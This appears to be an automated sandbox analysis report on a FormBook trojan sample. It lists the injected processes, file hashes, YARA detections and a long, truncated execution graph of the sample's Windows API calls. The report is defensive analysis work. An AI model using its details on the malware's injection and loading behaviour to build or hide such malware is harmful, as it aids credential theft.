                          MD5 hash:52EF22AF5530FE6362D8638583866C7F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:2
                          Start time:06:02:07
                          Start date:13/09/2024
                          Path:C:\Windows\SysWOW64\svchost.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe"
                          Imagebase:0xe80000
                          File size:46'504 bytes
                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2584333644.0000000003160000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2584333644.0000000003160000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2583640738.0000000000380000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2583640738.0000000000380000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2584390096.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2584390096.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:5
                          Start time:06:02:49
                          Start date:13/09/2024
                          Path:C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe"
                          Imagebase:0x1c0000
                          File size:140'800 bytes
                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3347630657.00000000035F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3347630657.00000000035F0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                          Reputation:high
                          Has exited:false

                          General

                          Target ID:6
                          Start time:06:02:50
                          Start date:13/09/2024
                          Path:C:\Windows\SysWOW64\netbtugc.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                          Imagebase:0x20000
                          File size:22'016 bytes
                          MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3345963921.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3345963921.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3347470009.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3347470009.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3347537099.0000000003710000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3347537099.0000000003710000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          Reputation:moderate
                          Has exited:false

                          General

                          Target ID:7
                          Start time:06:03:05
                          Start date:13/09/2024
                          Path:C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe"
                          Imagebase:0x1c0000
                          File size:140'800 bytes
                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3347309941.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3347309941.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          Reputation:high
                          Has exited:false

                          General

                          Target ID:8
                          Start time:06:03:22
                          Start date:13/09/2024
                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                          Imagebase:0x7ff79f9e0000
                          File size:676'768 bytes
                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:3.4%
                            Dynamic/Decrypted Code Coverage:2%
                            Signature Coverage:12%
                            Total number of Nodes:1943
                            Total number of Limit Nodes:166
                            execution_graph 108315 f1eed 108320 9e975 108315->108320 108317 f1f01 108336 a1b2a 52 API calls __cinit 108317->108336 108319 f1f0b 108337 a010a 108320->108337 108322 9ea27 GetModuleFileNameW 108346 a297d 108322->108346 108324 9ea5b _wcsncat 108349 a2bff 108324->108349 108327 a010a 48 API calls 108328 9ea94 _wcscpy 108327->108328 108352 8d3d2 108328->108352 108332 9eae0 Mailbox 108332->108317 108333 a010a 48 API calls 108334 9eada _wcscat __NMSG_WRITE _wcsncpy 108333->108334 108334->108332 108334->108333 108335 8a4f6 48 API calls 108334->108335 108335->108334 108336->108319 108340 a0112 __calloc_impl 108337->108340 108339 a012c 108339->108322 108340->108339 108341 a012e std::exception::exception 108340->108341 108371 a45ec 108340->108371 108385 a7495 RaiseException 108341->108385 108343 a0158 108386 a73cb 47 API calls _free 108343->108386 108345 a016a 108345->108322 108393 a29c7 108346->108393 108419 aaab9 108349->108419 108353 a010a 48 API calls 108352->108353 108354 8d3f3 108353->108354 108355 a010a 48 API calls 108354->108355 108356 8d401 108355->108356 108357 9eb05 108356->108357 108431 8c4cd 108357->108431 108359 9eb14 RegOpenKeyExW 108360 f4b17 RegQueryValueExW 108359->108360 108361 9eb35 108359->108361 108362 f4b91 RegCloseKey 108360->108362 108363 f4b30 108360->108363 108361->108334 108364 a010a 48 API calls 108363->108364 108365 f4b49 108364->108365 108435 84bce 108365->108435 108368 f4b6f 108438 87e53 108368->108438 108369 f4b86 108369->108362 108372 a4667 __calloc_impl 108371->108372 108378 a45f8 __calloc_impl 108371->108378 108392 a889e 47 API calls __getptd_noexit 108372->108392 108375 a462b RtlAllocateHeap 108375->108378 108384 a465f 108375->108384 108377 a4653 108390 a889e 47 API calls __getptd_noexit 108377->108390 108378->108375 108378->108377 108381 a4651 108378->108381 108382 a4603 108378->108382 108391 a889e 47 API calls __getptd_noexit 108381->108391 108382->108378 108387 a8e52 47 API calls __NMSG_WRITE 108382->108387 108388 a8eb2 47 API calls 5 library calls 108382->108388 108389 a1d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 108382->108389 108384->108340 108385->108343 108386->108345 108387->108382 108388->108382 108390->108381 108391->108384 108392->108384 108394 a29e2 108393->108394 108397 a29d6 108393->108397 108417 a889e 47 API calls __getptd_noexit 108394->108417 108396 a2b9a 108399 a29c2 108396->108399 108418 a7aa0 8 API calls __mbstowcs_s_l 108396->108418 108397->108394 108400 a2a55 108397->108400 108412 aa9fb 47 API calls __mbstowcs_s_l 108397->108412 108399->108324 108400->108394 108407 a2ac2 108400->108407 108413 aa9fb 47 API calls __mbstowcs_s_l 108400->108413 108402 a2b21 108402->108394 108402->108399 108403 a2b31 108402->108403 108416 aa9fb 47 API calls __mbstowcs_s_l 108403->108416 108405 a2ae0 108405->108394 108406 a2afc 108405->108406 108414 aa9fb 47 API calls __mbstowcs_s_l 108405->108414 108406->108394 108406->108399 108409 a2b12 108406->108409 108407->108402 108407->108405 108415 aa9fb 47 API calls __mbstowcs_s_l 108409->108415 108412->108400 108413->108407 108414->108406 108415->108399 108416->108399 108417->108396 108418->108399 108420 aaaca 108419->108420 108421 aabc6 108419->108421 108420->108421 108427 aaad5 108420->108427 108429 a889e 47 API calls __getptd_noexit 108421->108429 108423 aabbb 108430 a7aa0 8 API calls __mbstowcs_s_l 108423->108430 108425 9ea8a 108425->108327 108427->108425 108428 a889e 47 API calls __getptd_noexit 108427->108428 108428->108423 108429->108423 108430->108425 108432 8c4da 108431->108432 108433 8c4e7 108431->108433 108432->108359 108434 a010a 48 API calls 108433->108434 108434->108432 108436 a010a 48 API calls 108435->108436 108437 84be0 RegQueryValueExW 108436->108437 108437->108368 108437->108369 108439 87ecf 108438->108439 108441 87e5f __NMSG_WRITE 108438->108441 108451 8a2fb 108439->108451 108442 87e7b 108441->108442 108443 87ec7 108441->108443 108447 8a6f8 108442->108447 108450 87eda 48 API calls 108443->108450 108446 87e85 _memmove 108446->108369 108448 a010a 48 API calls 108447->108448 108449 8a702 108448->108449 108449->108446 108450->108446 108452 8a309 108451->108452 108454 8a321 _memmove 108451->108454 108452->108454 108455 8b8a7 108452->108455 108454->108446 108456 8b8ba 108455->108456 108457 8b8b7 _memmove 108455->108457 108458 a010a 48 API calls 108456->108458 108457->108454 108458->108457 108459 8e8eb 108462 92b40 108459->108462 108461 8e8f7 108463 92b98 108462->108463 108532 92bfc __NMSG_WRITE _memmove 108462->108532 108464 92bbf 108463->108464 108465 933cb 108463->108465 108466 f7cf3 108463->108466 108467 a010a 48 API calls 108464->108467 108542 85577 346 API calls Mailbox 108465->108542 108469 f7cf8 108466->108469 108476 f7d15 108466->108476 108470 92be8 108467->108470 108469->108464 108473 f7d01 108469->108473 108471 a010a 48 API calls 108470->108471 108471->108532 108472 f7d38 108558 cd520 86 API calls 4 library calls 108472->108558 108556 dd443 346 API calls Mailbox 108473->108556 108476->108472 108557 dd8ff 346 API calls 2 library calls 108476->108557 108477 9366d 108578 cd520 86 API calls 4 library calls 108477->108578 108480 f8518 108480->108461 108481 f83d1 108566 cd520 86 API calls 4 library calls 108481->108566 108482 f84df 108577 cd520 86 API calls 4 library calls 108482->108577 108486 f83eb 108567 cd520 86 API calls 4 library calls 108486->108567 108487 f7e43 108559 cd520 86 API calls 4 library calls 108487->108559 108488 f8434 108569 cd520 86 API calls 4 library calls 108488->108569 108493 f844e 108570 cd520 86 API calls 4 library calls 108493->108570 108494 8d2d2 53 API calls 108494->108532 108495 a1b2a 52 API calls __cinit 108495->108532 108498 9345e 108568 cd520 86 API calls 4 library calls 108498->108568 108499 8d3d2 48 API calls 108499->108532 108500 f84b5 108575 cd520 86 API calls 4 library calls 108500->108575 108501 8d349 53 API calls 108501->108532 108504 f84c8 108576 cd520 86 API calls 4 library calls 108504->108576 108507 8fa40 346 API calls 108507->108532 108508 87e53 48 API calls 108508->108532 108510 a010a 48 API calls 108510->108532 108512 f81d7 108563 dd154 48 API calls 108512->108563 108514 93157 108514->108461 108515 93637 108571 cd520 86 API calls 4 library calls 108515->108571 108516 f84a4 108574 cd520 86 API calls 4 library calls 108516->108574 108519 8c935 48 API calls 108519->108532 108521 8cdb4 48 API calls 108521->108532 108522 f822c 108565 8346e 48 API calls 108522->108565 108526 ba599 InterlockedDecrement 108526->108532 108527 f826c 108527->108514 108573 cd520 86 API calls 4 library calls 108527->108573 108528 f81ea 108528->108522 108564 dd154 48 API calls 108528->108564 108530 f8259 108531 83320 48 API calls 108530->108531 108533 f8261 108531->108533 108532->108477 108532->108481 108532->108482 108532->108486 108532->108487 108532->108488 108532->108493 108532->108494 108532->108495 108532->108498 108532->108499 108532->108500 108532->108501 108532->108504 108532->108507 108532->108508 108532->108510 108532->108512 108532->108514 108532->108515 108532->108516 108532->108519 108532->108521 108532->108526 108532->108527 108537 8ca8e 48 API calls 108532->108537 108538 8d380 108532->108538 108543 8346e 48 API calls 108532->108543 108544 83320 108532->108544 108555 8203a 346 API calls 108532->108555 108560 8d89e 50 API calls Mailbox 108532->108560 108561 dd154 48 API calls 108532->108561 108562 cab1c 50 API calls 108532->108562 108533->108527 108535 f8478 108533->108535 108534 f8236 108534->108515 108534->108530 108572 cd520 86 API calls 4 library calls 108535->108572 108537->108532 108539 8d38b 108538->108539 108540 8d3b4 108539->108540 108579 8d772 55 API calls 108539->108579 108540->108532 108542->108514 108543->108532 108545 83334 108544->108545 108547 83339 Mailbox 108544->108547 108580 8342c 48 API calls 108545->108580 108553 83347 108547->108553 108581 8346e 48 API calls 108547->108581 108549 a010a 48 API calls 108550 833d8 108549->108550 108552 a010a 48 API calls 108550->108552 108551 83422 108551->108532 108554 833e3 108552->108554 108553->108549 108553->108551 108554->108532 108555->108532 108556->108514 108557->108472 108558->108532 108559->108514 108560->108532 108561->108532 108562->108532 108563->108528 108564->108528 108565->108534 108566->108486 108567->108514 108568->108514 108569->108493 108570->108514 108571->108514 108572->108514 108573->108514 108574->108514 108575->108514 108576->108514 108577->108514 108578->108480 108579->108540 108580->108547 108581->108553 108582 f1e8b 108587 9e44f 108582->108587 108586 f1e9a 108588 a010a 48 API calls 108587->108588 108589 9e457 108588->108589 108591 9e46b 108589->108591 108595 9e74b 108589->108595 108594 a1b2a 52 API calls __cinit 108591->108594 108594->108586 108596 9e754 108595->108596 108597 9e463 108595->108597 108627 a1b2a 52 API calls __cinit 108596->108627 108599 9e47b 108597->108599 108600 8d3d2 48 API calls 108599->108600 108601 9e492 GetVersionExW 108600->108601 108602 87e53 48 API calls 108601->108602 108603 9e4d5 108602->108603 108628 9e5f8 108603->108628 108610 f29f9 108611 9e55f GetCurrentProcess 108645 9e70e LoadLibraryA GetProcAddress 108611->108645 108612 9e576 108614 9e5ec GetSystemInfo 108612->108614 108615 9e59e 108612->108615 108616 9e5c9 108614->108616 108639 9e694 108615->108639 108618 9e5dc 108616->108618 108619 9e5d7 FreeLibrary 108616->108619 108618->108591 108619->108618 108621 9e5e4 GetSystemInfo 108623 9e5be 108621->108623 108622 9e5b4 108642 9e437 108622->108642 108623->108616 108626 9e5c4 FreeLibrary 108623->108626 108626->108616 108627->108597 108629 9e601 108628->108629 108630 8a2fb 48 API calls 108629->108630 108631 9e4dd 108630->108631 108632 9e617 108631->108632 108633 9e625 108632->108633 108634 8a2fb 48 API calls 108633->108634 108635 9e4e9 108634->108635 108635->108610 108636 9e6d1 108635->108636 108646 9e6e3 108636->108646 108650 9e6a6 108639->108650 108643 9e694 2 API calls 108642->108643 108644 9e43f GetNativeSystemInfo 108643->108644 108644->108623 108645->108612 108647 9e55b 108646->108647 108648 9e6ec LoadLibraryA 108646->108648 108647->108611 108647->108612 108648->108647 108649 9e6fd GetProcAddress 108648->108649 108649->108647 108651 9e5ac 108650->108651 108652 9e6af LoadLibraryA 108650->108652 108651->108621 108651->108622 108652->108651 108653 9e6c0 GetProcAddress 108652->108653 108653->108651 108654 f1eca 108659 9be17 108654->108659 108658 f1ed9 108660 8d3d2 48 API calls 108659->108660 108661 9be85 108660->108661 108667 9c929 108661->108667 108663 9bf22 108664 9bf3e 108663->108664 108670 9c8b7 48 API calls _memmove 108663->108670 108666 a1b2a 52 API calls __cinit 108664->108666 108666->108658 108671 9c955 108667->108671 108670->108663 108672 9c948 108671->108672 108673 9c962 108671->108673 108672->108663 108673->108672 108674 9c969 RegOpenKeyExW 108673->108674 108674->108672 108675 9c983 RegQueryValueExW 108674->108675 108676 9c9b9 RegCloseKey 108675->108676 108677 9c9a4 108675->108677 108676->108672 108677->108676 108678 a52303 108679 a5230a 108678->108679 108680 a52312 108679->108680 108681 a523a8 108679->108681 108685 a51fb8 108680->108685 108698 a52c58 9 API calls 108681->108698 108684 a5238f 108699 a4f9a8 108685->108699 108688 a52088 CreateFileW 108689 a52057 108688->108689 108692 a52095 108688->108692 108690 a520b1 VirtualAlloc 108689->108690 108689->108692 108696 a521b8 CloseHandle 108689->108696 108697 a521c8 VirtualFree 108689->108697 108702 a52ec8 GetPEB 108689->108702 108691 a520d2 ReadFile 108690->108691 108690->108692 108691->108692 108695 a520f0 VirtualAlloc 108691->108695 108693 a522a4 VirtualFree 108692->108693 108694 a522b2 108692->108694 108693->108694 108694->108684 108695->108689 108695->108692 108696->108689 108697->108689 108698->108684 108704 a52e68 GetPEB 108699->108704 108701 a50033 108701->108689 108703 a52ef2 108702->108703 108703->108688 108705 a52e92 108704->108705 108705->108701 108706 fa0a7 108710 caf66 108706->108710 108708 fa0b2 108709 caf66 84 API calls 108708->108709 108709->108708 108711 cafa0 108710->108711 108716 caf73 108710->108716 108711->108708 108712 cafa2 108751 9f833 81 API calls 108712->108751 108713 cafa7 108721 884a6 108713->108721 108716->108711 108716->108712 108716->108713 108719 caf9a 108716->108719 108717 cafae 108741 87b4b 108717->108741 108750 94265 61 API calls _memmove 108719->108750 108722 884be 108721->108722 108739 884ba 108721->108739 108723 f5592 __i64tow 108722->108723 108724 884d2 108722->108724 108725 f5494 108722->108725 108733 884ea __itow Mailbox _wcscpy 108722->108733 108752 a234b 80 API calls 3 library calls 108724->108752 108727 f549d 108725->108727 108728 f557a 108725->108728 108732 f54bc 108727->108732 108727->108733 108757 a234b 80 API calls 3 library calls 108728->108757 108729 a010a 48 API calls 108731 884f4 108729->108731 108731->108739 108753 8caee 108731->108753 108734 a010a 48 API calls 108732->108734 108733->108729 108736 f54d9 108734->108736 108737 a010a 48 API calls 108736->108737 108738 f54ff 108737->108738 108738->108739 108740 8caee 48 API calls 108738->108740 108739->108717 108740->108739 108742 f240d 108741->108742 108743 87b5d 108741->108743 108764 bc0a2 48 API calls _memmove 108742->108764 108758 8bbd9 108743->108758 108746 87b69 108746->108711 108747 f2417 108765 8c935 108747->108765 108749 f241f Mailbox 108750->108711 108751->108713 108752->108733 108754 8cafd __NMSG_WRITE _memmove 108753->108754 108755 a010a 48 API calls 108754->108755 108756 8cb3b 108755->108756 108756->108739 108757->108733 108759 8bbe7 108758->108759 108763 8bc0d _memmove 108758->108763 108760 a010a 48 API calls 108759->108760 108759->108763 108761 8bc5c 108760->108761 108762 a010a 48 API calls 108761->108762 108762->108763 108763->108746 108764->108747 108766 8c948 108765->108766 108767 8c940 108765->108767 108766->108749 108769 8d805 108767->108769 108770 8d828 _memmove 108769->108770 108771 8d815 108769->108771 108770->108766 108771->108770 108772 a010a 48 API calls 108771->108772 108772->108770 108773 a6a80 108774 a6a8c __fcloseall 108773->108774 108810 a8b7b GetStartupInfoW 108774->108810 108776 a6a91 108812 aa937 GetProcessHeap 108776->108812 108778 a6ae9 108779 a6af4 108778->108779 108897 a6bd0 47 API calls 3 library calls 108778->108897 108813 a87d7 108779->108813 108782 a6afa 108783 a6b05 __RTC_Initialize 108782->108783 108898 a6bd0 47 API calls 3 library calls 108782->108898 108834 aba66 108783->108834 108786 a6b14 108787 a6b20 GetCommandLineW 108786->108787 108899 a6bd0 47 API calls 3 library calls 108786->108899 108853 b3c2d GetEnvironmentStringsW 108787->108853 108790 a6b1f 108790->108787 108794 a6b45 108866 b3a64 108794->108866 108797 a6b4b 108798 a6b56 108797->108798 108901 a1d7b 47 API calls 3 library calls 108797->108901 108880 a1db5 108798->108880 108801 a6b5e 108802 a6b69 __wwincmdln 108801->108802 108902 a1d7b 47 API calls 3 library calls 108801->108902 108884 83682 108802->108884 108805 a6b7d 108806 a6b8c 108805->108806 108903 a2011 47 API calls _doexit 108805->108903 108904 a1da6 47 API calls _doexit 108806->108904 108809 a6b91 __fcloseall 108811 a8b91 108810->108811 108811->108776 108812->108778 108905 a1e5a 30 API calls 2 library calls 108813->108905 108815 a87dc 108906 a8ab3 InitializeCriticalSectionAndSpinCount 108815->108906 108817 a87e1 108818 a87e5 108817->108818 108908 a8afd TlsAlloc 108817->108908 108907 a884d 50 API calls 2 library calls 108818->108907 108821 a87ea 108821->108782 108822 a87f7 108822->108818 108823 a8802 108822->108823 108909 a7616 108823->108909 108826 a8844 108917 a884d 50 API calls 2 library calls 108826->108917 108829 a8849 108829->108782 108830 a8823 108830->108826 108831 a8829 108830->108831 108916 a8724 47 API calls 4 library calls 108831->108916 108833 a8831 GetCurrentThreadId 108833->108782 108835 aba72 __fcloseall 108834->108835 108926 a8984 108835->108926 108837 aba79 108838 a7616 __calloc_crt 47 API calls 108837->108838 108839 aba8a 108838->108839 108840 abaf5 GetStartupInfoW 108839->108840 108842 aba95 __fcloseall @_EH4_CallFilterFunc@8 108839->108842 108848 abc33 108840->108848 108850 abb0a 108840->108850 108841 abcf7 108933 abd0b LeaveCriticalSection _doexit 108841->108933 108842->108786 108844 abc7c GetStdHandle 108844->108848 108845 a7616 __calloc_crt 47 API calls 108845->108850 108846 abc8e GetFileType 108846->108848 108847 abb58 108847->108848 108851 abb8a GetFileType 108847->108851 108852 abb98 InitializeCriticalSectionAndSpinCount 108847->108852 108848->108841 108848->108844 108848->108846 108849 abcbb InitializeCriticalSectionAndSpinCount 108848->108849 108849->108848 108850->108845 108850->108847 108850->108848 108851->108847 108851->108852 108852->108847 108854 a6b30 108853->108854 108856 b3c3e 108853->108856 108860 b382b GetModuleFileNameW 108854->108860 108855 b3c59 108972 a7660 47 API calls __crtGetStringTypeA_stat 108855->108972 108856->108855 108856->108856 108858 b3c64 _memmove 108859 b3c7a FreeEnvironmentStringsW 108858->108859 108859->108854 108861 b385f _wparse_cmdline 108860->108861 108862 a6b3a 108861->108862 108863 b3899 108861->108863 108862->108794 108900 a1d7b 47 API calls 3 library calls 108862->108900 108973 a7660 47 API calls __crtGetStringTypeA_stat 108863->108973 108865 b389f _wparse_cmdline 108865->108862 108867 b3a7d __NMSG_WRITE 108866->108867 108871 b3a75 108866->108871 108868 a7616 __calloc_crt 47 API calls 108867->108868 108876 b3aa6 __NMSG_WRITE 108868->108876 108869 b3afd 108870 a28ca _free 47 API calls 108869->108870 108870->108871 108871->108797 108872 a7616 __calloc_crt 47 API calls 108872->108876 108873 b3b22 108874 a28ca _free 47 API calls 108873->108874 108874->108871 108876->108869 108876->108871 108876->108872 108876->108873 108877 b3b39 108876->108877 108974 b3317 47 API calls __mbstowcs_s_l 108876->108974 108975 a7ab0 IsProcessorFeaturePresent 108877->108975 108879 b3b45 108879->108797 108881 a1dc1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 108880->108881 108883 a1e00 __IsNonwritableInCurrentImage 108881->108883 108998 a1b2a 52 API calls __cinit 108881->108998 108883->108801 108885 8369c 108884->108885 108886 f23b5 108884->108886 108887 836d6 IsThemeActive 108885->108887 108999 a2025 108887->108999 108891 83702 109011 832de SystemParametersInfoW SystemParametersInfoW 108891->109011 108893 8370e 109012 8374e GetCurrentDirectoryW 108893->109012 108896 8373b 108896->108805 108897->108779 108898->108783 108899->108790 108903->108806 108904->108809 108905->108815 108906->108817 108907->108821 108908->108822 108912 a761d 108909->108912 108911 a765a 108911->108826 108915 a8b59 TlsSetValue 108911->108915 108912->108911 108913 a763b Sleep 108912->108913 108918 b3e5a 108912->108918 108914 a7652 108913->108914 108914->108911 108914->108912 108915->108830 108916->108833 108917->108829 108919 b3e65 108918->108919 108924 b3e80 __calloc_impl 108918->108924 108920 b3e71 108919->108920 108919->108924 108925 a889e 47 API calls __getptd_noexit 108920->108925 108922 b3e90 HeapAlloc 108923 b3e76 108922->108923 108922->108924 108923->108912 108924->108922 108924->108923 108925->108923 108927 a89a8 EnterCriticalSection 108926->108927 108928 a8995 108926->108928 108927->108837 108934 a8a0c 108928->108934 108930 a899b 108930->108927 108958 a1d7b 47 API calls 3 library calls 108930->108958 108933->108842 108935 a8a18 __fcloseall 108934->108935 108936 a8a39 108935->108936 108937 a8a21 108935->108937 108942 a8aa1 __fcloseall 108936->108942 108950 a8a37 108936->108950 108959 a8e52 47 API calls __NMSG_WRITE 108937->108959 108940 a8a26 108960 a8eb2 47 API calls 5 library calls 108940->108960 108942->108930 108943 a8a4d 108945 a8a63 108943->108945 108946 a8a54 108943->108946 108944 a8a2d 108961 a1d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 108944->108961 108949 a8984 __lock 46 API calls 108945->108949 108963 a889e 47 API calls __getptd_noexit 108946->108963 108952 a8a6a 108949->108952 108950->108936 108962 a7660 47 API calls __crtGetStringTypeA_stat 108950->108962 108951 a8a59 108951->108942 108953 a8a79 InitializeCriticalSectionAndSpinCount 108952->108953 108954 a8a8e 108952->108954 108956 a8a94 108953->108956 108964 a28ca 108954->108964 108970 a8aaa LeaveCriticalSection _doexit 108956->108970 108959->108940 108960->108944 108962->108943 108963->108951 108965 a28d3 RtlFreeHeap 108964->108965 108966 a28fc __dosmaperr 108964->108966 108965->108966 108967 a28e8 108965->108967 108966->108956 108971 a889e 47 API calls __getptd_noexit 108967->108971 108969 a28ee GetLastError 108969->108966 108970->108942 108971->108969 108972->108858 108973->108865 108974->108876 108976 a7abb 108975->108976 108981 a7945 108976->108981 108980 a7ad6 108980->108879 108982 a795f _memset __call_reportfault 108981->108982 108983 a797f IsDebuggerPresent 108982->108983 108989 a8e3c SetUnhandledExceptionFilter UnhandledExceptionFilter 108983->108989 108985 a7a43 __call_reportfault 108990 ab4bf 108985->108990 108987 a7a66 108988 a8e27 GetCurrentProcess TerminateProcess 108987->108988 108988->108980 108989->108985 108991 ab4c9 IsProcessorFeaturePresent 108990->108991 108992 ab4c7 108990->108992 108994 b4560 108991->108994 108992->108987 108997 b450f 5 API calls 2 library calls 108994->108997 108996 b4643 108996->108987 108997->108996 108998->108883 109000 a8984 __lock 47 API calls 108999->109000 109001 a2030 109000->109001 109057 a8ae8 LeaveCriticalSection 109001->109057 109003 836fb 109004 a208d 109003->109004 109005 a20b1 109004->109005 109006 a2097 109004->109006 109005->108891 109006->109005 109058 a889e 47 API calls __getptd_noexit 109006->109058 109008 a20a1 109059 a7aa0 8 API calls __mbstowcs_s_l 109008->109059 109010 a20ac 109010->108891 109011->108893 109060 84257 109012->109060 109014 8377f IsDebuggerPresent 109015 8378d 109014->109015 109016 f21b7 MessageBoxA 109014->109016 109017 83852 109015->109017 109019 f21d0 109015->109019 109020 837aa 109015->109020 109016->109019 109018 83859 SetCurrentDirectoryW 109017->109018 109023 83716 SystemParametersInfoW 109018->109023 109231 c2f5b 48 API calls 109019->109231 109124 83bff 109020->109124 109023->108896 109024 f21e0 109029 f21f6 SetCurrentDirectoryW 109024->109029 109026 837c8 GetFullPathNameW 109136 834f3 109026->109136 109029->109023 109030 8380f 109031 83818 109030->109031 109232 bbe31 AllocateAndInitializeSid CheckTokenMembership FreeSid 109030->109232 109151 830a5 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 109031->109151 109035 f2213 109035->109031 109037 f2224 GetModuleFileNameW 109035->109037 109038 8caee 48 API calls 109037->109038 109041 f2245 109038->109041 109039 83822 109040 83837 109039->109040 109159 83598 109039->109159 109169 8e1f0 109040->109169 109044 f224c 109041->109044 109045 f2271 109041->109045 109233 839e8 48 API calls 2 library calls 109044->109233 109236 839e8 48 API calls 2 library calls 109045->109236 109049 f2257 109234 839e8 48 API calls 2 library calls 109049->109234 109050 f226d GetForegroundWindow ShellExecuteW 109055 f22a5 Mailbox 109050->109055 109054 f2264 109235 839e8 48 API calls 2 library calls 109054->109235 109055->109017 109057->109003 109058->109008 109059->109010 109237 83c70 109060->109237 109064 84278 GetModuleFileNameW 109254 834c1 109064->109254 109069 8caee 48 API calls 109070 842ba 109069->109070 109071 8d380 55 API calls 109070->109071 109072 842ca Mailbox 109071->109072 109073 8caee 48 API calls 109072->109073 109074 842f2 109073->109074 109075 8d380 55 API calls 109074->109075 109076 84305 Mailbox 109075->109076 109077 8caee 48 API calls 109076->109077 109078 84316 109077->109078 109269 8d2d2 109078->109269 109080 84328 Mailbox 109081 8d3d2 48 API calls 109080->109081 109082 8433b 109081->109082 109275 84477 109082->109275 109086 84355 109087 8435f 109086->109087 109088 f20f7 109086->109088 109089 a1bc7 _W_store_winword 59 API calls 109087->109089 109090 84477 48 API calls 109088->109090 109091 8436a 109089->109091 109092 f210b 109090->109092 109091->109092 109093 84374 109091->109093 109095 84477 48 API calls 109092->109095 109094 a1bc7 _W_store_winword 59 API calls 109093->109094 109096 8437f 109094->109096 109097 f2127 109095->109097 109098 f212f GetModuleFileNameW 109096->109098 109099 84389 109096->109099 109097->109098 109100 84477 48 API calls 109098->109100 109101 a1bc7 _W_store_winword 59 API calls 109099->109101 109102 f2160 109100->109102 109103 84394 109101->109103 109104 8c935 48 API calls 109102->109104 109105 843d6 109103->109105 109106 f2185 _wcscpy 109103->109106 109110 84477 48 API calls 109103->109110 109108 f216e 109104->109108 109105->109106 109107 843e7 109105->109107 109115 84477 48 API calls 